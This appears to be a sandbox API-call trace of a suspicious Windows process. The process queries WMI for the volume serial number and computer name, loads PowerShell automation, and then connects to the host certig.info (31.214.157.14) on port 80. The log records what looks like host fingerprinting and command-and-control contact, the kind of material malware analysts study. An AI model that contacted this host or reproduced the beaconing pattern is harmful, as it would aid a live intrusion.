	[0245.836] IWbemClassObject:Get (in: This=0x608d4a0, wszName="__NAMESPACE", lFlags=0, pVal=0x5faea14*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e80c14*=0, plFlavor=0x2e80c18*=0 | out: pVal=0x5faea14*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x2e80c14*=8, plFlavor=0x2e80c18*=64) returned 0x0
	[0245.837] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0245.837] IWbemClassObject:Get (in: This=0x608d4a0, wszName="__NAMESPACE", lFlags=0, pVal=0x5faea18*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e80c14*=8, plFlavor=0x2e80c18*=64 | out: pVal=0x5faea18*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x2e80c14*=8, plFlavor=0x2e80c18*=64) returned 0x0
	[0245.837] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0245.837] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6080820, puCount=0x5faea58 | out: puCount=0x5faea58*=0x2) returned 0x0
	[0245.837] WbemDefPath:IWbemPath:GetText (in: This=0x6080820, lFlags=4, puBuffLength=0x5faea54*=0x0, pszText=0x0 | out: puBuffLength=0x5faea54*=0x17, pszText=0x0) returned 0x0
	[0245.837] WbemDefPath:IWbemPath:GetText (in: This=0x6080820, lFlags=4, puBuffLength=0x5faea54*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5faea54*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0245.837] IWbemClassObject:Get (in: This=0x608d4a0, wszName="__CLASS", lFlags=0, pVal=0x5faea14*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e80ccc*=0, plFlavor=0x2e80cd0*=0 | out: pVal=0x5faea14*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x2e80ccc*=8, plFlavor=0x2e80cd0*=64) returned 0x0
	[0245.838] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0245.838] IWbemClassObject:Get (in: This=0x608d4a0, wszName="__CLASS", lFlags=0, pVal=0x5faea18*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e80ccc*=8, plFlavor=0x2e80cd0*=64 | out: pVal=0x5faea18*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x2e80ccc*=8, plFlavor=0x2e80cd0*=64) returned 0x0
	[0245.838] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0245.843] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6080820, puCount=0x5faea48 | out: puCount=0x5faea48*=0x2) returned 0x0
	[0245.843] WbemDefPath:IWbemPath:GetText (in: This=0x6080820, lFlags=4, puBuffLength=0x5faea44*=0x0, pszText=0x0 | out: puBuffLength=0x5faea44*=0x17, pszText=0x0) returned 0x0
	[0245.844] WbemDefPath:IWbemPath:GetText (in: This=0x6080820, lFlags=4, puBuffLength=0x5faea44*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5faea44*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0245.844] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6080820, puCount=0x5faea48 | out: puCount=0x5faea48*=0x2) returned 0x0
	[0245.844] WbemDefPath:IWbemPath:GetText (in: This=0x6080820, lFlags=4, puBuffLength=0x5faea44*=0x0, pszText=0x0 | out: puBuffLength=0x5faea44*=0x17, pszText=0x0) returned 0x0
	[0245.844] WbemDefPath:IWbemPath:GetText (in: This=0x6080820, lFlags=4, puBuffLength=0x5faea44*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5faea44*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0245.844] IWbemClassObject:GetNames (in: This=0x608d4a0, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x5faea0c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x5fae9d8 | out: pNames=0x5fae9d8*="\x01ƀ\x04") returned 0x0
	[0245.844] SafeArrayGetDim (psa=0x586338) returned 0x1
	[0245.845] SafeArrayGetDim (psa=0x586338) returned 0x1
	[0245.845] SafeArrayGetLBound (in: psa=0x586338, nDim=0x1, plLbound=0x5fae5d4 | out: plLbound=0x5fae5d4) returned 0x0
	[0245.845] IWbemClassObject:Get (in: This=0x608d4a0, wszName="__GENUS", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e816cc*=0, plFlavor=0x2e816d0*=0 | out: pVal=0x5faea04*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x2e816cc*=3, plFlavor=0x2e816d0*=64) returned 0x0
	[0245.845] IWbemClassObject:Get (in: This=0x608d4a0, wszName="__CLASS", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e81700*=0, plFlavor=0x2e81704*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x2e81700*=8, plFlavor=0x2e81704*=64) returned 0x0
	[0245.845] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0245.846] IWbemClassObject:Get (in: This=0x608d4a0, wszName="__SUPERCLASS", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e81754*=0, plFlavor=0x2e81758*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_StorageVolume", varVal2=0x0), pType=0x2e81754*=8, plFlavor=0x2e81758*=64) returned 0x0
	[0245.846] SysStringLen (param_1="CIM_StorageVolume") returned 0x11
	[0245.846] IWbemClassObject:Get (in: This=0x608d4a0, wszName="__DYNASTY", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e817b0*=0, plFlavor=0x2e817b4*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_ManagedSystemElement", varVal2=0x0), pType=0x2e817b0*=8, plFlavor=0x2e817b4*=64) returned 0x0
	[0245.846] SysStringLen (param_1="CIM_ManagedSystemElement") returned 0x18
	[0245.846] IWbemClassObject:Get (in: This=0x608d4a0, wszName="__RELPATH", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e8181c*=0, plFlavor=0x2e81820*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x2e8181c*=8, plFlavor=0x2e81820*=64) returned 0x0
	[0245.846] SysStringLen (param_1="Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x4d
	[0245.847] IWbemClassObject:Get (in: This=0x608d4a0, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e818f0*=0, plFlavor=0x2e818f4*=0 | out: pVal=0x5faea04*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2c, varVal2=0x0), pType=0x2e818f0*=3, plFlavor=0x2e818f4*=64) returned 0x0
	[0245.847] IWbemClassObject:Get (in: This=0x608d4a0, wszName="__DERIVATION", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e81924*=0, plFlavor=0x2e81928*=0 | out: pVal=0x5faea04*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x586338*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x573d80, rgsabound=((cElements=0x5, lLbound=0))), varVal2=0x0), pType=0x2e81924*=8200, plFlavor=0x2e81928*=64) returned 0x0
	[0245.848] IWbemClassObject:Get (in: This=0x608d4a0, wszName="__SERVER", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e81a88*=0, plFlavor=0x2e81a8c*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x2e81a88*=8, plFlavor=0x2e81a8c*=64) returned 0x0
	[0245.848] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0245.848] IWbemClassObject:Get (in: This=0x608d4a0, wszName="__NAMESPACE", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e81ad4*=0, plFlavor=0x2e81ad8*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x2e81ad4*=8, plFlavor=0x2e81ad8*=64) returned 0x0
	[0245.848] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0245.848] IWbemClassObject:Get (in: This=0x608d4a0, wszName="__PATH", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e81b24*=0, plFlavor=0x2e81b28*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x2e81b24*=8, plFlavor=0x2e81b28*=64) returned 0x0
	[0245.848] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x64
	[0245.848] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6080820, puCount=0x5faea84 | out: puCount=0x5faea84*=0x2) returned 0x0
	[0245.849] WbemDefPath:IWbemPath:GetText (in: This=0x6080820, lFlags=4, puBuffLength=0x5faea80*=0x0, pszText=0x0 | out: puBuffLength=0x5faea80*=0x17, pszText=0x0) returned 0x0
	[0245.849] WbemDefPath:IWbemPath:GetText (in: This=0x6080820, lFlags=4, puBuffLength=0x5faea80*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5faea80*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0245.849] IWbemClassObject:Get (in: This=0x608d4a0, wszName="SerialNumber", lFlags=0, pVal=0x5faea40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e81c78*=0, plFlavor=0x2e81c7c*=0 | out: pVal=0x5faea40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9c354b42, varVal2=0x0), pType=0x2e81c78*=19, plFlavor=0x2e81c7c*=0) returned 0x0
	[0245.849] IWbemClassObject:Get (in: This=0x608d4a0, wszName="SerialNumber", lFlags=0, pVal=0x5faeaf8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e81c78*=19, plFlavor=0x2e81c7c*=0 | out: pVal=0x5faeaf8*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9c354b42, varVal2=0x0), pType=0x2e81c78*=19, plFlavor=0x2e81c7c*=0) returned 0x0
	[0246.010] send (s=0x424, buf=0x2e9088c*, len=71, flags=0) returned 71
	[0246.011] GetLastError () returned 0x0
	[0246.048] recv (in: s=0x424, buf=0x2dfdb34, len=502, flags=0 | out: buf=0x2dfdb34*) returned 502
	[0246.048] GetLastError () returned 0x0
	[0246.051] VirtualQuery (in: lpAddress=0x5fade58, lpBuffer=0x5faee58, dwLength=0x1c | out: lpBuffer=0x5faee58*(BaseAddress=0x5fad000, AllocationBase=0x5620000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0246.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5fae718, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.055] GetLastError () returned 0x0
	[0246.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5fae6c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.055] GetLastError () returned 0x0
	[0246.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5fae6c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.055] GetLastError () returned 0x0
	[0246.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5fae6c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.055] GetLastError () returned 0x0
	[0246.354] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4f1518, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0246.354] GetLastError () returned 0xcb
	[0246.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5fae93c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.668] GetLastError () returned 0x0
	[0246.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5fae8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.668] GetLastError () returned 0x0
	[0246.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5fae8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.668] GetLastError () returned 0x0
	[0246.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5fae8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.668] GetLastError () returned 0x0
	[0247.514] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4f1518, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0247.514] GetLastError () returned 0xcb
	[0247.717] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4e0
	[0247.717] GetLastError () returned 0x0
	[0257.808] CloseHandle (hObject=0x4e0) returned 1
	[0257.808] GetLastError () returned 0x0
	[0257.817] shutdown (s=0x424, how=2) returned 0
	[0257.817] GetLastError () returned 0x0
	[0257.818] closesocket (s=0x424) returned 0
	[0257.818] GetLastError () returned 0x0
	[0257.956] getaddrinfo (in: pNodeName="certig.info", pServiceName=0x0, pHints=0x5fae970*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x5fae704 | out: ppResult=0x5fae704*=0x584268*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="certig.info", ai_addr=0x572d78*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) returned 0
	[0257.962] GetLastError () returned 0x0
	[0257.963] FreeAddrInfoW (pAddrInfo=0x584268*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="散瑲杩椮普o࠰՞鈡㦊", ai_addr=0x572d78*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) 
	[0257.963] GetLastError () returned 0x0
	[0257.963] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x424
	[0257.963] GetLastError () returned 0x0
	[0257.963] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4e0
	[0257.963] GetLastError () returned 0x0
	[0257.964] WSAConnect (in: s=0x424, name=0x2f01978*(sa_family=2, sin_port=0x50, sin_addr="31.214.157.14"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0258.158] GetLastError () returned 0x0
	[0258.159] closesocket (s=0x4e0) returned 0
	[0258.159] GetLastError () returned 0x0
	[0258.410] recv (in: s=0x424, buf=0x2fac898, len=502, flags=0 | out: buf=0x2fac898*) returned 117
	[0258.410] GetLastError () returned 0x0
	[0258.423] VirtualQuery (in: lpAddress=0x5fade58, lpBuffer=0x5faee58, dwLength=0x1c | out: lpBuffer=0x5faee58*(BaseAddress=0x5fad000, AllocationBase=0x5620000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0258.473] CoGetObjectContext (in: riid=0x2b5ad00*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae9cc | out: ppv=0x5fae9cc*=0x4a8dec) returned 0x0
	[0258.473] IComThreadingInfo:GetCurrentApartmentType (in: This=0x4a8dec, pAptType=0x5fae9c4 | out: pAptType=0x5fae9c4*=1) returned 0x0
	[0258.473] IUnknown:QueryInterface (in: This=0x4a8dec, riid=0x2b5ace8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5fae9c8 | out: ppvObject=0x5fae9c8*=0x0) returned 0x80004002
	[0258.473] IUnknown:Release (This=0x4a8dec) returned 0x1
	[0258.486] CoGetClassObject (in: rclsid=0x563d04*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae4e4 | out: ppv=0x5fae4e4*=0x6080bf0) returned 0x0
	[0258.487] WbemDefPath:IUnknown:QueryInterface (in: This=0x6080bf0, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fae314 | out: ppvObject=0x5fae314*=0x0) returned 0x80004002
	[0258.487] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6080bf0, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae34c | out: ppvObject=0x5fae34c*=0x608d3d8) returned 0x0
	[0258.487] WbemDefPath:IUnknown:QueryInterface (in: This=0x608d3d8, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae0f0 | out: ppvObject=0x5fae0f0*=0x608d3d8) returned 0x0
	[0258.487] WbemDefPath:IUnknown:QueryInterface (in: This=0x608d3d8, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fae0ac | out: ppvObject=0x5fae0ac*=0x0) returned 0x80004002
	[0258.488] WbemDefPath:IUnknown:AddRef (This=0x608d3d8) returned 0x3
	[0258.488] CoGetContextToken (in: pToken=0x5fadf38 | out: pToken=0x5fadf38) returned 0x0
	[0258.488] WbemDefPath:IUnknown:QueryInterface (in: This=0x608d3d8, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadf20 | out: ppvObject=0x5fadf20*=0x58f770) returned 0x0
	[0258.488] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x58f770, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fadf28 | out: pCid=0x5fadf28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0258.488] WbemDefPath:IUnknown:Release (This=0x58f770) returned 0x3
	[0258.489] CoGetContextToken (in: pToken=0x5fadf30 | out: pToken=0x5fadf30) returned 0x0
	[0258.489] WbemDefPath:IUnknown:AddRef (This=0x608d3d8) returned 0x4
	[0258.489] WbemDefPath:IUnknown:QueryInterface (in: This=0x608d3d8, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadfa4 | out: ppvObject=0x5fadfa4*=0x0) returned 0x80004002
	[0258.489] WbemDefPath:IUnknown:Release (This=0x608d3d8) returned 0x3
	[0258.489] WbemDefPath:IUnknown:Release (This=0x608d3d8) returned 0x2
	[0258.489] WbemDefPath:IUnknown:Release (This=0x6080bf0) returned 0x0
	[0258.489] WbemDefPath:IUnknown:Release (This=0x608d3d8) returned 0x1
	[0258.489] CoGetContextToken (in: pToken=0x5fae7e0 | out: pToken=0x5fae7e0) returned 0x0
	[0258.489] CoGetContextToken (in: pToken=0x5fae7a0 | out: pToken=0x5fae7a0) returned 0x0
	[0258.490] WbemDefPath:IUnknown:AddRef (This=0x608d3d8) returned 0x2
	[0258.490] WbemDefPath:IUnknown:QueryInterface (in: This=0x608d3d8, riid=0x5fae81c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5fae818 | out: ppvObject=0x5fae818*=0x608d3d8) returned 0x0
	[0258.490] WbemDefPath:IUnknown:Release (This=0x608d3d8) returned 0x2
	[0258.490] WbemDefPath:IUnknown:Release (This=0x608d3d8) returned 0x1
	[0258.490] CoGetContextToken (in: pToken=0x5fae860 | out: pToken=0x5fae860) returned 0x0
	[0258.490] CoGetContextToken (in: pToken=0x5fae820 | out: pToken=0x5fae820) returned 0x0
	[0258.490] WbemDefPath:IUnknown:AddRef (This=0x608d3d8) returned 0x2
	[0258.490] WbemDefPath:IUnknown:QueryInterface (in: This=0x608d3d8, riid=0x5fae89c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5fae898 | out: ppvObject=0x5fae898*=0x608d3d8) returned 0x0
	[0258.490] WbemDefPath:IUnknown:Release (This=0x608d3d8) returned 0x2
	[0258.491] WbemDefPath:IUnknown:AddRef (This=0x608d3d8) returned 0x3
	[0258.491] WbemDefPath:IWbemPath:SetText (This=0x608d3d8, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.491] WbemDefPath:IUnknown:Release (This=0x608d3d8) returned 0x2
	[0258.491] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x608d3d8, puCount=0x5faea04 | out: puCount=0x5faea04*=0x2) returned 0x0
	[0258.491] WbemDefPath:IWbemPath:GetText (in: This=0x608d3d8, lFlags=4, puBuffLength=0x5faea00*=0x0, pszText=0x0 | out: puBuffLength=0x5faea00*=0x17, pszText=0x0) returned 0x0
	[0258.491] WbemDefPath:IWbemPath:GetText (in: This=0x608d3d8, lFlags=4, puBuffLength=0x5faea00*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5faea00*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.491] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x608d3d8, puCount=0x5faea00 | out: puCount=0x5faea00*=0x2) returned 0x0
	[0258.491] WbemDefPath:IWbemPath:GetText (in: This=0x608d3d8, lFlags=4, puBuffLength=0x5fae9fc*=0x0, pszText=0x0 | out: puBuffLength=0x5fae9fc*=0x17, pszText=0x0) returned 0x0
	[0258.491] WbemDefPath:IWbemPath:GetText (in: This=0x608d3d8, lFlags=4, puBuffLength=0x5fae9fc*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5fae9fc*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.491] CoGetObjectContext (in: riid=0x2b5ad00*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae97c | out: ppv=0x5fae97c*=0x4a8dec) returned 0x0
	[0258.491] IComThreadingInfo:GetCurrentApartmentType (in: This=0x4a8dec, pAptType=0x5fae974 | out: pAptType=0x5fae974*=1) returned 0x0
	[0258.492] IUnknown:QueryInterface (in: This=0x4a8dec, riid=0x2b5ace8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5fae978 | out: ppvObject=0x5fae978*=0x0) returned 0x80004002
	[0258.492] IUnknown:Release (This=0x4a8dec) returned 0x1
